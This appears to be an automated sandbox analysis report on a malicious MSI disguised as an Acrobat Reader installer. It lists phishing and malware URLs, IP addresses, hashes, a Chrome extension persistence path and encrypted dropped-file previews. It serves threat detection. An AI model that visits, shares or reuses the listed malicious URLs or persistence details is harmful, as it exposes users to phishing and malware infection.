                                    https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:3fb1b101-3543-43ab-a071-b57438ac152eGet hashmaliciousUnknownBrowse
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      public.adobecc.map.fastly.nethForm.0198840 739798.msiGet hashmaliciousUnknownBrowse
                                      • 151.101.1.138
                                      SecuriteInfo.com.Win64.DropperX-gen.10232.23831.exeGet hashmaliciousUnknownBrowse
                                      • 151.101.1.138
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      FASTLYUShttps://bvapllc.freshdesk.com/en/support/solutions/articles/154000165865-secure-business-documentsGet hashmaliciousHTMLPhisherBrowse
                                      • 151.101.66.137
                                      http://coiebasiexton.webflow.io/Get hashmaliciousUnknownBrowse
                                      • 151.101.2.188
                                      https://dgfuyh.weebly.com/Get hashmaliciousUnknownBrowse
                                      • 151.101.65.46
                                      http://pub-a20aefa2dae846bf9e646c61874b02a4.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                      • 185.199.108.153
                                      https://dharaprajapati2.github.io/Netflix-cloneGet hashmaliciousUnknownBrowse
                                      • 185.199.110.133
                                      http://pub-cf0b7d66a2a2480eb9d33f2d7d006449.r2.dev/a22.htmlGet hashmaliciousUnknownBrowse
                                      • 151.101.130.137
                                      http://tinyurl.com/37xr9ez4Get hashmaliciousUnknownBrowse
                                      • 151.101.193.108
                                      http://www.jevainternational.com/SharePointProposalFile/Get hashmaliciousUnknownBrowse
                                      • 151.101.129.74
                                      https://contractproposa.weebly.com/Get hashmaliciousUnknownBrowse
                                      • 151.101.129.44
                                      http://sign-in-att-107403.weeblysite.com/Get hashmaliciousUnknownBrowse
                                      • 151.101.129.46
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      3b5074b1b5d032e5620f69f9f700ff0eyM80f3LuOQ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 151.101.129.138
                                      https://dgfuyh.weebly.com/Get hashmaliciousUnknownBrowse
                                      • 151.101.129.138
                                      http://wellsfargo.dealogic.com/clientportal/Conferences/Registration/Form/368?menuItemId=5Get hashmaliciousUnknownBrowse
                                      • 151.101.129.138
                                      https://dharaprajapati2.github.io/Netflix-cloneGet hashmaliciousUnknownBrowse
                                      • 151.101.129.138
                                      http://tinyurl.com/37xr9ez4Get hashmaliciousUnknownBrowse
                                      • 151.101.129.138
                                      http://sign-in-att-107403.weeblysite.com/Get hashmaliciousUnknownBrowse
                                      • 151.101.129.138
                                      http://aks34.github.io/NETFLIX_CLONE/Get hashmaliciousUnknownBrowse
                                      • 151.101.129.138
                                      http://ipfs.io/ipfs/bafkreighlryyquvwncfjki32xkca3dafzoxaan33ptn7lqqb5hzvwz4zfyGet hashmaliciousUnknownBrowse
                                      • 151.101.129.138
                                      http://saidtlarrr.net/Get hashmaliciousUnknownBrowse
                                      • 151.101.129.138
                                      http://pub-e7be145935f648eaa59329583c5ab8b4.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                      • 151.101.129.138
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.50hForm.0198840 739798.msiGet hashmaliciousUnknownBrowse
                                        ust_019821730-0576383.msiGet hashmaliciousUnknownBrowse
                                          Br_i421i2-2481-125_754864.msiGet hashmaliciousUnknownBrowse
                                            181_960.msiGet hashmaliciousUnknownBrowse
                                              232_786.msiGet hashmaliciousUnknownBrowse
                                                zHsIxYcmJV.msiGet hashmaliciousUnknownBrowse
                                                  18847_9.msiGet hashmaliciousUnknownBrowse
                                                    C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.14hForm.0198840 739798.msiGet hashmaliciousUnknownBrowse
                                                      ust_019821730-0576383.msiGet hashmaliciousUnknownBrowse
                                                        Br_i421i2-2481-125_754864.msiGet hashmaliciousUnknownBrowse
                                                          181_960.msiGet hashmaliciousUnknownBrowse
                                                            232_786.msiGet hashmaliciousUnknownBrowse
                                                              zHsIxYcmJV.msiGet hashmaliciousUnknownBrowse
                                                                18847_9.msiGet hashmaliciousUnknownBrowse
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):671510
                                                                  Entropy (8bit):6.594695011681219
                                                                  Encrypted:false
                                                                  SSDEEP:12288:4urEvhNDNMgr6xtRdYn/VkRFcJcI32R7vKG+4vz/1FJlt2R45cKEKgh:fihNREtRdYndJP32R7vKG+47/L025zEV
                                                                  MD5:9144C0BAAB91D54C67997F472DB9DA39
                                                                  SHA1:22706E43BC795CD82E050C3D4E4B7E8DBE97BFA5
                                                                  SHA-256:1CF3E4FF0D35C7DB701B8E4FAA717CCC5EA33D781E8B742965179E1985D8751D
                                                                  SHA-512:05D7FC8F207711B13ACD30E53144D9439E872A62ABDC13D860838F0617A527C23FA95B175B6F326C7753C5912708FCAEE3D915F65CD1311F5B18C4093A5C3229
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Config.Msi\53e56c.rbs, Author: Joe Security
                                                                  Reputation:low
                                                                  Preview:...@IXOS.@.....@...X.@.....@.....@.....@.....@.....@......&.{4433395F-681D-4D29-AC5B-870AC8B40C57}..Acrobat Reader..2024.0198840 298135.msi.@.....@.....@.....@........&.{5B6FA660-828A-4D54-BAE1-600B3F823A73}.....@.....@.....@.....@.......@.....@.....@.......@......Acrobat Reader......Rollback..A.....o. .d.e. .r.e.s.t.a.u.r.a.....o.....RollbackCleanup..Removendo arquivos de backup..Arquivo: [1]....ProcessComponents%.Atualizando o registro de componentes..&.{D608D6C6-E1D1-48EF-AE39-6038652DD840}&.{4433395F-681D-4D29-AC5B-870AC8B40C57}.@......&.{66973ED1-FE65-4BFA-9786-51A78A35D3C5}&.{4433395F-681D-4D29-AC5B-870AC8B40C57}.@......&.{1C3CF7CC-0B79-4D0C-B5C7-4E7B695092B2}&.{4433395F-681D-4D29-AC5B-870AC8B40C57}.@......&.{846297BD-3254-46D3-BB02-C5279035B4E3}&.{4433395F-681D-4D29-AC5B-870AC8B40C57}.@......&.{E645B104-AA3E-45F4-A83F-A94FA4A6A22A}&.{4433395F-681D-4D29-AC5B-870AC8B40C57}.@......&.{AC76558A-C195-4808-88F2-F0D69298B03F}&.{4433395F-681D-4D29-AC5B-870AC8B40C57}.@......&.{ED36AE2B-47
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):228
                                                                  Entropy (8bit):4.952191968532408
                                                                  Encrypted:false
                                                                  SSDEEP:6:KdhlRu9TbX+A8/5RFYpe0VFkZh0VFX0CdiYCMfrA1G:KLuVA5cpe0sf0v07v9G
                                                                  MD5:71A961EAEEE6401B21519038533456C2
                                                                  SHA1:C1342AB256C12E757BF4001D1F218B251CEF43D5
                                                                  SHA-256:3FBF01883BFF061FBBBA0C18E87C80C98290040C8A80C5161C7E53F2254D59AC
                                                                  SHA-512:BC32583D42D7E38B2A1E92619550550563FF5CD0D4D7F0902BC752AD20BB6BB4865046B7932563CD979659A79BB291CB30618068AB7036E7090A3C32682F38FB
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:<assembly.. xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>.. <assemblyIdentity.. name='126.0.6478.127'.. version='126.0.6478.127'.. type='win32'/>.. <file name='chrome_elf.dll'/>..</assembly>..
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):103991
                                                                  Entropy (8bit):7.998327541415064
                                                                  Encrypted:true
                                                                  SSDEEP:1536:P5DGAhZ+Fj+rvsO8dPUKkCohq5eJomYJiXw10rFhoMKyTJYGEG+XnyR:PNGAba1DcKo0eJXASxaMnFN+XyR
                                                                  MD5:CAA89004DB99A2ADBB5AF8C708A83D24
                                                                  SHA1:0553BAE827AF709CA174A90C3380C998BF3E4971
                                                                  SHA-256:FE967E1B16FE2B3635A789DC39DA30BF25F4695F114BCFA9EDA630828F5823BB
                                                                  SHA-512:BD2BA2BDD969C61DC4C9BA4EF1716FCBC4F9356B12C5A69D3E4F1257C7BC4A12DFE11B8B385982B9A18011CD492F5B5C0D74CB6A30128958C8D938AD3384AD83
                                                                  Malicious:true
                                                                  Reputation:low
                                                                  Preview:..x..&.aN-Q...3ht.p8...:........+Pu.Nqt.Ip.%*.f?.(2k\.)....H.I.Z...?.I......f>......,..h.....V...^.:._i.v..Vz...,.|.m.q..t..?.D6..N7.U...=..J...1...n.....0.u1+@..+.x{..|.I..~y*&_.....l<L.}....Gj..........s....}o...../Y?..VV.Z.a.........~.4.......)....OA..lHm^F.^..".=.s._. S.n.w6.c./.n.h..N.D...0^.~....,}n..h.....rK.H.d:...D.JJ|$...>....s...h.........zS.-]@I..}.Y]..8.P..`.G\Z.............O'gnW....1.p5...6.....#.E.....U.P.%)./.m.......i{.+...6.d3...+!.k:'..".@...&........Tl..yA..Z.q..#......D".."h..J.M.)B.._Z....G..z.:`.3...Ta...Q.q=N..H..D.V.....f..<c..f.(.[.#.;..v...?.Z/.*j...w..+.....}nu..e.u....."kK_\.........|.6.....?.q...h......uG.C..k.?Oi..8,<i..D..|*=...,.....(......@......H...v.........<..l../t.....6...&yT..r.u..`....}......a....ur.7.H5_.(...+X ..#.....0.(\_..S.....5.\b.....qu+5........S8c....O......Jq.....+q&17..C..#...i. tIe.......;.cfU.3V.....~*...9.!..4{.3....cE...;....RK...I.j..c*<A.WN~....C.H.aL.....vVLm......(.q!
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):97519
                                                                  Entropy (8bit):7.998059770467659
                                                                  Encrypted:true
                                                                  SSDEEP:1536:s41vCdu9NXtS/dA4KDeefltb6ZDTgYMlqnysqe4PbbhIbtmHl8E5VjIsYsa:sYvC4NdGKDeeffZqnyXe4zb6oHugtJYr
                                                                  MD5:5D6EE938181D82EE2D9CDE7F7B732E75
                                                                  SHA1:FA884FBE87503B86C5DA66AC73EC1381DC900F27
                                                                  SHA-256:F88FC25525E1180B73C9B37CAE20A9B4FF32987BF614FB3B1DA29DCC31BDFC10
                                                                  SHA-512:1AA228880A7F9915E08BBF9929DD5FB5F7E185351BD23FC49FD977A0102F21F6E99404264DAEB19AAE03D6FE41C4C11A496C3E3FF350388F61C1ABB47AA979AC
                                                                  Malicious:true
                                                                  Reputation:low
                                                                  Preview:.N:"vMS2.F.]...8O..6D..M...egv..'.@.._...Cu....kc]6)%I...]s.O...1K..5...b.......m.u...^.aPCD.......vSS.0hM..5...Uv!.....x.....:l.f.....d.Un...F...^.g.....2.[....V.b.......K..r...f..W.F......$..}........z.V.1.=..I.2+*.6.............%...b.Tq..J.....:.....v..(&,.|.gnv&.WH.)..[......F.....)?.0^....G.w...Z(...MZ.E......N.q.I...n..H...IE.sl..c..l..[...E.M%Z^.._N...F....)Pj...m....O..-.."..7f..=...oq.x.d..re...hlQ.C.\"...P=...~.g.!.o|...p.F..C..Nks..|C'#.~Ad.L.r.n.u..(....B.FB1..1.U2..1..hn../.D...E.?..u.........`l.J[.Pct].....ml.anJ...1v|..[.......sq..4...Z!.$4WW...R..f....:w.[sK..bQ..jI.+.N.aO...a..z.N...L.5.~..E/c...L~...$.me..k...D..LU..>I!.9..r.~.......<......I$C. V(..#(]....]6...i........N.d..x......q.8r?.(.R.7.#.0G.....~X........;...;....ghr.)....t.vuye~.M.....,.[Q..V.P.G.K!.e.=..z..8AY.....!9[.............1...].b..V.G......w.7....;.X..l.H...YQ..*..PH%}.$..$..J+...IG...8............C..d...K..=....u.kL.(..k...U..#...e,....4i&.>...Az.gh..&...
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):104708
                                                                  Entropy (8bit):7.998144550191305
                                                                  Encrypted:true
                                                                  SSDEEP:1536:kw6o34Q10auP010rl/MMZIHw+6tQP/7s3EgJ33eP6iuoH01FOn7acb0kvXbJ:D46d2rlUMZIHGWP/7s3tuP6iE7u0kvLJ
                                                                  MD5:5567BFFAE9E3519CEFEDF97092A374F8
                                                                  SHA1:C03147DC3CB25A2A0381CD4F934E4289347BE317
                                                                  SHA-256:DCE1C47108988E44E9EAC44437FCA9B6CA80BB833604B89759F3244A392CEC42
                                                                  SHA-512:0176DEA07103AB310355C8EBF5D3CAF25839EEBCB7DEC273405D3ABBA516679BEE0D0DE308F82E4C486A2E76DDBF65176A57B0C6E8F6DEB6491BE3BFB85AC14B
                                                                  Malicious:true
                                                                  Preview:6U#....9..Y...w....g}..f....,..$..F...!..x..b..j.L...A....E.a&..N...7..bJ...l.l......`=.....!.`...9.)#.[.g...@....0.D|o*.Q|)._y..C..l..B....i....?..M:..0....1..m8Y.h.....'..........h.v+.b~s.Dg.MM,..I......3...4...L3...1|.....u.!..P..~k..hh1....6.>X.R.b..@9.....)4C.....T.....b.....M..D+......a.G...S]Cbt.6.G..'..1......~..x.\.n....E.E...na%.V....n.....B.u.h..H..;z.3.#..4..W.....3|dr..U.z.9.&.o.....B..#X...^...._.&K..H...}y...._...`..!!.ne.bI&..x.....y..m...^..Y.3..2ul.......AN..K...v..o....X...w5".21,1..uw...9.V..< 9... -..=.c....;..GQ....w.$r..$...Y.ZK0..S..."._.'...\V...;N....M......x..8.1D+.4..t.c._..5sX......mR.g.$0.w..G.....]..o..xD..vp,..qg..'....In..n...0DB....7.h...,......@.....;.7<...[vO"B.5A3..H.Qo.d..&.s...S.v....jJ.#Sa.S5.K....LT^t..^Cc".cX.?*%.*..^.....aP...eG.....yf..bb......WvJ.{...S6D...R..X._....Q..0cja...._......(k.6Fa>_>.t.-H.S..._....<.?.#..O..D.H6.98.....s..T........7..j.../..g....B,'..VE.7.l..b%.
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):87789
                                                                  Entropy (8bit):7.99805920411028
                                                                  Encrypted:true
                                                                  SSDEEP:1536:anji+x+n09Z1mNOTg80ELTAqomeO8Y5XVaN1koUXWE/HS6u8/VvhI3jAWf+0mIzw:aji+LyuTAq7eNN1k9bSZyvhITJm09M0i
                                                                  MD5:944AB53D06E45EB2E1E8C2B2C6B00CFE
                                                                  SHA1:510B7982AE21DD5C4CDB79EDA4EC1EC54C26EAB6
                                                                  SHA-256:5C6FD879514A3C0C97F5C6F384482EE4D3150C3BED402609919CD8D8732ECA21
                                                                  SHA-512:AB0AE37163C334A6A83E1F41467DC5F21C067C33ACFDD0E864BCC6020D83BE5C00BDA38D1C6799FEDFE6C80F717930FB19049BE5F9BFFE34D3D91BDC4BCD423D
                                                                  Malicious:true
                                                                  Preview:...oy...L.0 .....f...[.8a.qT.6nG....Z....J.[k...H.7@J*ht.Ds..i.....P.iU...].]..Z.?...bi#.~=.I...~.&.aSY...>.9z....ir-VgUW0[V..<:.E...(g.9<).B.5...+i........5]k......&...T.5.OD."..c.=.j_$......[:...]....:O...;....m......a..<.|>.[.Yk......Zz.@.[D.I>...?.._v:.......k.a....+..O"..o.0....j......k...<3......l.S?......<......j{bPD..o..W.y....4n,J87....<....,.;.|.c.@.|....!.f....CT...9}k.P.jf..;$....X.,$q|8.a...r.i.-...FQU.#{.1.,a....SwU.@.O..a....<...=cz.A.....~..d.0O.x.....yQ/...q...M.Q. ..ee...!..a{l..[.)....-K.-+.J.C.6...Q...a6.9M...N/1..tA..O..1.$..ZqB....A....N...J....s..`..<..VT;w)K}r...f..}......;S.Zf`...gK.r#S?.>..X..S...\...[s:...o..(...V.>f'f.:l.,e&U?..m.3d.....jT|.j...T..S.(.ZI..16.c(.........(.)I".~.........;.._..#....T:..$.'j....4...`-....5.*...i.'.%...,..4.*..t..:.\.c.1....a....#..<..K.......w&.f.....D.yA..Y."3.f@4.Z.8OK4....5...X..1!Z..xD.D.v!h...{H.o..J...4....]...i.?..?......C.......x.....)g.p4X<..&S`...f|.G.....\..~..:
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):32184
                                                                  Entropy (8bit):7.993984375372734
                                                                  Encrypted:true
                                                                  SSDEEP:768:FTuiWqjj/ndxrW8vBLtxMC32sFqz6LtYhATViwRP:Z5N/nvS8v/xMCDFostfV3P
                                                                  MD5:0DBF722D1FA4C22E4B10C69CF9AA7813
                                                                  SHA1:DEA4661D11603DB0F5FA7605E937B2065C1E60C0
                                                                  SHA-256:F5AF4E2B5911EA08B406E3EA44BA099B1A1E035C963C4260ACADA6D8A6AC8F81
                                                                  SHA-512:B5FB16D56716B2D228093AD7FAE80C85748236EF413078815D4615EFF1E249B217CFCC5728690EBF2967F98373EF652053230579D31D2FE422BE5B49F327C798
                                                                  Malicious:true
                                                                  Preview:T.}..-oOR....f.N.F....B..5...'..I.R.c....B._|Pb}>..w:.w..w.;.......&..@...*.)..8# .b....#L. ';6..m._."/}..p.....mRsZ.;1.x$U.:........o%HXC......9....H.r..S.kXf!u~.{/.."pKV).8...2.FC%.r...........W."qA....I....h.o......./..j.~.Jw7K`..5S\By..N...eW+.'j...".?.)P.`.[.....m..Q....55J!.h|3\........E.]..p.M.....[..r..i.`......d.I...:.....>Mn.Df'...Q.D..%.'..@m.x.^.x.....6.r...Fkh|.v...a.......Y.?I.MI..*;`m]Ucl.........Z.N...O.>A9...4F....W..?.?...6*.=.@#z.;7..a.}.T .8...(v".r..].[".W.W|.u..../...e......d.U&.$2.9.O..c.\P...3......Y.......h.......=...x....H#.a.)....y..>.|,FB..Ap.$/d+.....`j2.1*t......{.....^.&..@.L%..k9..9.e......q*.^R...x.k..<.0....1....;Rr.Y.+MpI.....`.q.=.<.-.P..m2..n6.......WMF3...G.}:...xHZ.....-.{.Is...n.7A.......X....m.$;.....kI.rm0....q*.;.6.Z..{..k_.c....MK..J*..1.G..:..I.p..mZ...j....8..t]........5{..J.ME..=....E+..S.+.`,F.....)..'W.."#iT>..CcZ.[.~..C:..v7..x.........lI.jS....C......... ..e.(..4.:.8*@ha...S....tA.8..A.D.
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:OpenPGP Secret Key
                                                                  Category:dropped
                                                                  Size (bytes):57860
                                                                  Entropy (8bit):7.996961383097085
                                                                  Encrypted:true
                                                                  SSDEEP:1536:4onB7ezCgX0whRqKNY2Hv1R4eETDPlLLVI/FFVUmmCM:/BizCgEwhRqzNtLLVwbFrM
                                                                  MD5:5E494E15A0AA584319E0FCA3204F2E67
                                                                  SHA1:D4A8E02A765EE181E5980950223A7A3ADA8B7017
                                                                  SHA-256:17A6F1C5E2B5D1681188F42641AE8C55E520D1E9710995462D0B0A52289D4D74
                                                                  SHA-512:B9D7C9AF05F3C94C954A011B1CCB8709CAA218A271CAA56D025CB5369DDCB6403B33330BB9D2B79973110E6AFAFD27469B5DBA36ED18F4701344598FF0D9AC60
                                                                  Malicious:true
                                                                  Preview:.).d.S....;..D...S..@. .....&>RH.$.u.]2.4.5..]..........R\L..i.Q.F..I..(....p........ .oiu..Y7..rwg.Z....SS.a.=#.e.@.7R..l,.8..6.9.......C.iRu...Z.|...r,3l............j.L\Cn..........t.V5{.wW.K..Z._}\..8I..7....Ku......../.`...-wH...o{:..H@.....`.+S3..6..jH...Ik.!..N2.._..\...9...m|..^.*.5.:R.5....^.......rI..m..K.<%..\..<;Wj...R.C.Od.[b...S5...f.$...f\<...7p..1g."...B.3..w.:.....-C...q..r..G5".I.S...EH.W..._F.ZC.~.......v..~A|NWxx\l....|..; h>.41X.f...-y..;e....A[.].w^].....oy0....|..=."..S.'J*j..........7T}....N._....-....j.]....z.w.......b;a.+R.*.P...].p;..K$....a.g_r..4.[r..`.2j.|........&3..e.k.j.B.......?+..7T.Q......7..ye<..9..$;.h....]........o*T.e?.A.."{......l.]..Z...xt..W|.B.....f,}P..&...)z.,eb..Q..J....1...fa...0........3iL.kA...w.........:..h.H.dKF.2.o........:uv../.,............,p.#k..X........er.j4.7.....mY.{...x2.\5].:K..A=..d0..4..(7.......gx).f...-.x.w,M.H."!.Q..c.u..NIV&O....(.W.B./.....Np.........W,A3.x....@...
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):98056
                                                                  Entropy (8bit):7.998371655290425
                                                                  Encrypted:true
                                                                  SSDEEP:1536:7Z6vVvq0fFRvHymqh2GB0pqeCAz2GRkOgfKZ/sNZAJMKSSNlC1kW5iqKWNV2EuAT:8vtqqFRjqQGB4qz/kk/KZ66SMKkq/nhp
                                                                  MD5:976772315D7C186F84C04FCEAE791102
                                                                  SHA1:EA82D9DCF5A3C349C04B2B6339F68359369434E6
                                                                  SHA-256:DE8F33830B565C5E3CB7ABB7F18C03500445435571CC3C1C225762005247E111
                                                                  SHA-512:737320BCC7815FBC08F68C21403ED12C471A2F1042DC298FD0F3FBE2F7A691EC84CA8AD398321007FFABA485623B9BA1D0C21AC212E7EC1D9C5D421DF3680330
                                                                  Malicious:true
                                                                  Preview:...c....5 ..kZ..A\>Qe9J.:Pu...&..F..j9...q6.K./.....(....p...d..?'.....>..f..cp?:...cM...:B..1.g...[.U.......\.]...C.P^.........>U9...;V6..$..-...,.|..!OC.|r.....:.NR..TS....xj.o.6..H....4NWp.6..,.p.b.(.3.f....!l...}=.q.d..l.7../...%eF7....n..ck..-...........].!..u.FC..F....:..QeM.=C.....;....*j.%m.5.....:J.|..}..Q..(.s.S.~.6..;..._#.....d...c..G.B+\..<..K..u7.C..n.....pO..I,.{..%J....z.po...........ZH.r...C.yZ.X......r..o.......sMxM3.V.J.Y.!...$.y1....\bt...~.[..8......D..j..-.....zm.^.f.\Uh.%}..&G..X.."Xn..,%.lp...8...[q......_.+.<.u:=7..Ck8...|.C........GEi%i...E.....F..W.,....hFk.s.)..Z.oB*.Z.k.%.K..)&.QJ.....V.7N...1..w....LL...1.).7...JI.4...D.@t.%..V6Do4..RS...)$.u.........F...c....t..6v..........>...u..{.)w6..g..d.a.U...G8......i.P.Y..b..1`.0@.......6Q.b.Zi..pqH/.t49).y..L...T/.........C..E(rp.#..&4.'.R.D.&g...1.#X%..6.Q_5.#@..n.J.*.....L.(......U..J.......^.i.Z$h~7.....G.>M......r.%..y.C1.!.Rl1i.C..}...Hm.....xA`.~c......u:{
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):34684
                                                                  Entropy (8bit):7.994905347328629
                                                                  Encrypted:true
                                                                  SSDEEP:768:4m6MPwIyqOxCrc/GJgepQwD1LqJHyRypeaO/2dBs5RDcjt+pFj6n:4hMII6xUSSgepQy10HuaOYIDcjtWjm
                                                                  MD5:C6A071F9E4EBBC40D788D9EE3EC7A701
                                                                  SHA1:A0909E50ED30C22DF700D12AA04852FA5EC35D50
                                                                  SHA-256:AA7B884110F01F236CE4E4BF71FFCFB5BFA529C5EB35148C724B57C63119F4BE
                                                                  SHA-512:CAA6D307DCC6CB3B0B38AA3A7AE3ED7AA9B6CBBE41563798558C2908C2DE31A90914F95237815E2D8F87205EFE5AA469768CD84488015F60C18861F93494B39D
                                                                  Malicious:true
                                                                  Preview:{.4.-L.........+..N8.....>.8S;&.B.H.I<.*..Dn=.....i...c........`..M..m...d.~ ........k..y.fS.)..!.-"..8...>$...A.......I.2........X....|7&".....M..k@..Bw.....m._&.Y...9.<..U.5.........1..bB...F...2..c~...\Q"<.~...L...|.x......K..j.:PH.,...Z.j.b.0..e*.J.3R?..~.W-R?...h"..K.5..t.d.}Ak....I..,.~.....D.q6..>N....e.N.c..j../D..a.......x7...0.Y.2..Q.2.....I.....$H*.8.\.r....D......^.L2..|.x._.Bu..a>4'Q%.b<.r...h..J..u..h.V....."2.gH.....w.........o..*..ve....a..j..=a6...cE%..0.:jMU.;..C_N....Mb...Y......KA.VN).Lr..Dasa. .7..........N.uWHy. ..w2......."nA..K.Z....I.m.&)A..E...K4.E..x..wH48....#.............2./.F8./&[.."....s&.@D.:a..A....;.4..*.D.M4#.ys.....Q#...-..2.9DB.A2..I....H..$.L........Kp.....T,G`.A.%...... ..B.B.....^.......oZ.a.#A.m.. ..E.:`...U....G.....U...W.#.cL;-.i:G:%.$1G..B.w<by.......4.......n.i.Q.....~..L..i....-U*H0."6..9i..J...o.5a..:..x$.....d^..P.Z...&Yc.O.....u..@;..~.......E`<.......^j..<...M.8...JB.y....>..v:......'.V...
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):98056
                                                                  Entropy (8bit):7.998167444715926
                                                                  Encrypted:true
                                                                  SSDEEP:1536:5NfB96QKArtmwedP4QnzFeZgFGdKkPRuvMvMcBXxyOvAo41sEfyVoz32ervKNMR3:5Nfj/nJ5eiwxIfkkQvMvMcBBPX41RfyC
                                                                  MD5:D3CF1EB7E9041D68473E89B6602DB0A5
                                                                  SHA1:630D2557D2D6E4A247347DCF23D0922E7B88B0EE
                                                                  SHA-256:C4B853D65370A1075C03CBEFA43F9B13F75D6A6CF4B525A2C418B3678D3A703A
                                                                  SHA-512:6CB9BAB03A2328ADCE5FE8994B78DBFE088A0B473506AD3FB23E07071CD4043A313DF91EEAF1D825C57A3E8D7FFBE8702EA216A4184F7BC329F4F961CBC7E420
                                                                  Malicious:true
                                                                  Preview:..p..... .<..pR.~....O ..kt...l.x.K.....f.M....W.......9..k..x.x#..;.UK.r.Q...O...l.F..W.|.PU..b.WLP...S .....l..o..?..>e.4t.YY..;|.....Krx...$..'!D.GT.V:.R.|.c\ .y..CQ9.J:._..M]L.L?.....F...q...ub.#b+.&'{>O....|K2N'b...eG.Z\..k..iq...R.)U.....R...f.!S....A....tx..pcT.`w.22'........7f...Yu|$...?.......Nii.....bL.2...Cfe>..}..*V.F..^MKv.......qb..*. ... ...$8X..t5..vs..N...4.w.on.[..eJ..P..n.}..-.f.}6e...Os...Kf....R-Br..y..[L..|..<.Z......G7\.!q~.#....[..V.o...N..S.n..M..0Y.{.>...5...f.Fh....d...u}N.0......../&.j=uK.I..(j.z..`.L..Z.c.~...t.".>&.j.?..Q.X#|~...".Sv. h|.9y.5.".F6.H.g.X.u.|.g./...A.i...Z.l.\...T.~..Y...E.$}...fh..iC..}..-bM.....GjV...Yt...J...4...N...v.#l....s.H*.=1.K./]..0.w.2..3....k...%AN5P.HQ..*.;.qpz....C.q.....K(....'.2....^...Q.f.....'...w..n..G.......J...*Y.Q8...%.-..p....C&.,....w.n...]CN.....[..!...p..z...2bg>:..M..w.......#...6......y.z.2_..;{,......>8L.s..R .*.TUsNG...."...K...yU.m..l-..R...dEX..kL..?.oaR3...u
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):34684
                                                                  Entropy (8bit):7.995168454589623
                                                                  Encrypted:true
                                                                  SSDEEP:768:tpip6syW/aY8470KOXOgKSeSgnuSSE+nPoeNJFc:tJVWW+zSetuq+PRJG
                                                                  MD5:8CF4D3AA8024D528D346BBFCD432E596
                                                                  SHA1:A36BE219C6C48EEEA519C1995A3174CE9DBD153C
                                                                  SHA-256:BF356B2BDB4DA5A8282F418B0BAD391067969B6FD80D2954810D817253355D9B
                                                                  SHA-512:1FF0D1AD81519C678B612E4022E91B554EA67D13A00E6CB54FEA09E96793543A31BCF388B9406AA80A2D7BB77988642C8629BA638A1BDA1CADA882EEC1E06A5B
                                                                  Malicious:true
                                                                  Preview:!R[..h.B..N..Y.A...qAY].....|..0..]@....;..{d;.d...PS.......hRs{..>.HF.6F #[..ZKB2..p.)Dj.s....F...o..4n.#.N....G.e>..b....+.GH.\.H.p4r...4..........B2... .n.Je...DE..9.(au.j.x.R.:..FIK...#..W..-...Q......KG=}.4..w.."..c..s....}.4.....90..3..k.Je.i6.|.:...o..B(...|...NN.!mD.....L.-.bJ.L3Qz......[......Vr(9...B.F..d..S.x!~19..?n...)F.. /....V..8..;.....9....5|C.....D.Y...A<..V....R.........i..........H..!..i......?S..Cm%..X!O...u[..>..l.....|.8 .B.4...K.)....nWh..g..4>.......U.y..%L`...".x..7...GJ.........t.'.@^.&..~w."...+t.<..._."`-.U...]....S...............@<...xe.wr.*.5Ff.W..q....1..."...9.[P 0.Nn.q..D%....G`1).oA.f.5t..~.6...x.L'..^EY.."....!-QN..r..d*.(....F..AC.......G<.~.eS....Ru......n.c.../ 3.@...&...7.....O.9*1(4.)xu...(.fV....SK.(QE.6.:6j.B.d=.1..B..../.H........[.._f...`...K...........3E..CK.Mj..:b.Ip...o&@..1.(x..i!.i.,...1..."..9.;.]J....>.A.U.x?O.u....j..9T....w..U/.w/.7..,.lp..1!,h..y3.4.~.@/..{....A.....b....
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
